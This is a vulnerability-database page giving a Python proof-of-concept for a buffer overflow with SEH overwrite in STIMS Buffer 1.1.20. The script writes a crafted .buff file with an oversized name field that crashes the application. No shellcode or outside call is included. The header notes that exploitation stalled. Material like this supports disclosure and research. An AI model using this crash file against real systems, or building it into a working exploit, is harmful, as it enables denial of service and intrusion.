Lucene search
K

STIMS Buffer 1.1.20 - Buffer Overflow (PoC) (SEH Overwrite)

🗓️ 19 Feb 2016 00:00:00Reported by Shantanu KhandelwalType 
exploitpack
 exploitpack
👁 12 Views

STIMS Buffer 1.1.20 Buffer Overflow (PoC) (SEH Overwrite) How to crash: make the buff file and open it in the STIMSBuffer application. Click on View Report

Code
# Exploit Title: STIMS BUFFER OVERFLOW SEH OVERWRITE
# Date: 19 Feb 2016
# Exploit Author: Ishita Sailor <[email protected]>
# Vendor Homepage: http://www.stimslabs.com/
# Software Link: http://www.stimslabs.com/en/buffer/STIMSBufferEnSetup.exe
# Version: 1.1.20
# Tested on: Windows XP SP3
# CVE : UNKNOWN
# ==============HOW TO CRASH ==================
#make the buff file and open it it the STIMSBuffer application.
#Click on View Report
#===========================================
#Problems in exploitation
#Unable to find suitable SEH pointer
#


#!/usr/bin/env python
f=open("crash.buff","w")
payload="""<!--block:#solution-->
[solution]
name="""
payload +="\x41"*8460
payload +="\x42"*4 #SEH overwrite

payload +="""desc=asdasdasd
time=0
version=1
file=C:\Documents and Settings\IEUser\Desktop\z.buff
time.created=131003052796300000
app=1.1.1
projects=1
time.last=131003052894110000
<!--#solution:block-->
<!--block:Buffer 1-->
[properties]
buffer.id=0
buffer.name=Maleic acid / sodium hydrogen maleate
buffer.desc=Maleic acid / sodium hydrogen maleate with pKa 2
buffer.inp.pka=2.00000
buffer.inp.vol=1000.000000
buffer.inp.ph=2.000000
buffer.inp.conc=1.000000
buffer.inp.temp=24.000000
buffer.out.strength=0.592637
buffer.out.sln1.name=Maleic acid
buffer.out.sln1.conc=3.000000
buffer.out.sln1.vol=135.787622
buffer.out.sln2.name=Sodium hydrogen maleate
buffer.out.sln2.conc=3.000000
buffer.out.sln2.vol=197.545712
buffer.out.water=1000.000000
comment=
comment.active=0
notes=
notes.active=0
name=Buffer 1
active=1
<!--Buffer 1:block-->
"""
f.write(payload)
f.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation